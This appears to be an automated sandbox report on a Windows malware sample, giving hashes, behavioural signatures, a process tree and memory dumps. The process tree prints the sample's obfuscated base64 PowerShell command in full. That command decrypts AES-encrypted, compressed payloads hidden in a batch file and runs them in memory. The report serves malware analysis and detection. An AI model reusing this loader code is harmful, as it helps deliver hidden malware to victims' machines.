c501a5520a40c78e3561e9df6d8c6e348603eba519bf6b6ca80695a9305ecd1e

General

Target

9c9b3f88b4a6f0be5596d272c4db4cc2.exe
Size

578KB
MD5

9c9b3f88b4a6f0be5596d272c4db4cc2
SHA1

2bd7fc6b0e960f4f581481216697071c91c0b2e6
SHA256

c501a5520a40c78e3561e9df6d8c6e348603eba519bf6b6ca80695a9305ecd1e
SHA512

bd3d2d6bbfb9b1d18b908dbd9ed67ae60b9bb8feee74edd38841119695e4547410b4117483cba02ee78617d5181fb43b8c9121d62d5ef5087e86aeefd1b1778e
SSDEEP

12288:29oJNyggfDjjyUcnd78PNc+Ri2VBa4+5YanGv1c:mK0ggbjjmQFckrYP5HnGK

Score

1^/10

Malware Config

Signatures

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
864	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	864	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2916 wrote to memory of 2732	2916	9c9b3f88b4a6f0be5596d272c4db4cc2.exe	30
PID 2916 wrote to memory of 2732	2916	9c9b3f88b4a6f0be5596d272c4db4cc2.exe	30
PID 2916 wrote to memory of 2732	2916	9c9b3f88b4a6f0be5596d272c4db4cc2.exe	30
PID 2732 wrote to memory of 2884	2732	cmd.exe	32
PID 2732 wrote to memory of 2884	2732	cmd.exe	32
PID 2732 wrote to memory of 2884	2732	cmd.exe	32
PID 2732 wrote to memory of 2748	2732	cmd.exe	33
PID 2732 wrote to memory of 2748	2732	cmd.exe	33
PID 2732 wrote to memory of 2748	2732	cmd.exe	33
PID 2748 wrote to memory of 3020	2748	cmd.exe	35
PID 2748 wrote to memory of 3020	2748	cmd.exe	35
PID 2748 wrote to memory of 3020	2748	cmd.exe	35
PID 2748 wrote to memory of 2244	2748	cmd.exe	36
PID 2748 wrote to memory of 2244	2748	cmd.exe	36
PID 2748 wrote to memory of 2244	2748	cmd.exe	36
PID 2748 wrote to memory of 864	2748	cmd.exe	37
PID 2748 wrote to memory of 864	2748	cmd.exe	37
PID 2748 wrote to memory of 864	2748	cmd.exe	37

C:\Users\Admin\AppData\Local\Temp\9c9b3f88b4a6f0be5596d272c4db4cc2.exe
"C:\Users\Admin\AppData\Local\Temp\9c9b3f88b4a6f0be5596d272c4db4cc2.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2916
- C:\Windows\system32\cmd.exe
  "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\bat.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2732
- - C:\Windows\system32\cmd.exe
    cmd /c "set __=^&rem"
    3⤵
    PID:2884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\bat.bat
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2748
  - - C:\Windows\system32\cmd.exe
      cmd /c "set __=^&rem"
      4⤵
      PID:3020
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\bat.bat';iex ([Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtdyBoaWRkZW47ZnVuY3Rpb24gcFlBSmEoJHNORFFLKXskbXpYYlU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7JG16WGJVLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzskbXpYYlUuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OyRtelhiVS5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUThwVWY3K2hyVHVmb1JYSUpwMHRqME1NV3llMld1WnJNK2xFSTdJc1YvST0nKTskbXpYYlUuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUVVTbGNFdDNQMVYvbE1ucTJ6SnpHUT09Jyk7JGJ2eWxCPSRtelhiVS5DcmVhdGVEZWNyeXB0b3IoKTskZ1hwcFg9JGJ2eWxCLlRyYW5zZm9ybUZpbmFsQmxvY2soJHNORFFLLDAsJHNORFFLLkxlbmd0aCk7JGJ2eWxCLkRpc3Bvc2UoKTskbXpYYlUuRGlzcG9zZSgpOyRnWHBwWDt9ZnVuY3Rpb24gSUFGaUUoJHNORFFLKXskQWxKaVQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtKCwkc05EUUspOyRLbHFseD1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW07JG5IU0l0PU5ldy1PYmplY3QgU3lzdGVtLklPLkNvbXByZXNzaW9uLkdaaXBTdHJlYW0oJEFsSmlULFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTskbkhTSXQuQ29weVRvKCRLbHFseCk7JG5IU0l0LkRpc3Bvc2UoKTskQWxKaVQuRGlzcG9zZSgpOyRLbHFseC5EaXNwb3NlKCk7JEtscWx4LlRvQXJyYXkoKTt9JGhUdG9sPVtTeXN0ZW0uSU8uRmlsZV06OlJlYWRMaW5lcyhbQ29uc29sZV06OlRpdGxlKTskaEdyRW49SUFGaUUgKHBZQUphIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoW1N5c3RlbS5MaW5xLkVudW1lcmFibGVdOjpFbGVtZW50QXQoJGhUdG9sLCA1KS5TdWJzdHJpbmcoMikpKSk7JGxWQkxvPUlBRmlFIChwWUFKYSAoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFtTeXN0ZW0uTGlucS5FbnVtZXJhYmxlXTo6RWxlbWVudEF0KCRoVHRvbCwgNikuU3Vic3RyaW5nKDIpKSkpO1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kbFZCTG8pLkVudHJ5UG9pbnQuSW52b2tlKCRudWxsLCRudWxsKTtbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJGhHckVuKS5FbnRyeVBvaW50Lkludm9rZSgkbnVsbCwkbnVsbCk7'))) "
      4⤵
      PID:2244
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:864

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\bat.bat

Filesize
260KB

MD5
b4ffe21215f5ec03be7d19f014ea8ee0

SHA1
30eb6e177ef3997ea32cf62c5735b01581422ceb

SHA256
27f8e9db3065e87ba7a5d2c25103d63392dea5a9d19c18e49dde2dfccbf0d776

SHA512
38a86f93cefa6e423ffdcc17fcf2f955aca2961fd152315779c5b1f36374f3d8f37ec81e14d8e0502bae024f8976747cab7d654835a1627e301db3d48f31ee16

Download Submit
memory/864-6-0x000007FEF5890000-0x000007FEF622D000-memory.dmp

Filesize
9.6MB

Download
memory/864-7-0x0000000002640000-0x00000000026C0000-memory.dmp

Filesize
512KB

Download
memory/864-8-0x000000001B2F0000-0x000000001B5D2000-memory.dmp

Filesize
2.9MB

Download
memory/864-9-0x0000000002290000-0x0000000002298000-memory.dmp

Filesize
32KB

Download
memory/864-10-0x0000000002640000-0x00000000026C0000-memory.dmp

Filesize
512KB

Download
memory/864-11-0x0000000002640000-0x00000000026C0000-memory.dmp

Filesize
512KB

Download
memory/864-12-0x000007FEF5890000-0x000007FEF622D000-memory.dmp

Filesize
9.6MB

Download
memory/864-13-0x0000000002640000-0x00000000026C0000-memory.dmp

Filesize
512KB

Download
memory/864-14-0x0000000002640000-0x00000000026C0000-memory.dmp

Filesize
512KB

Download
memory/864-15-0x0000000002640000-0x00000000026C0000-memory.dmp

Filesize
512KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads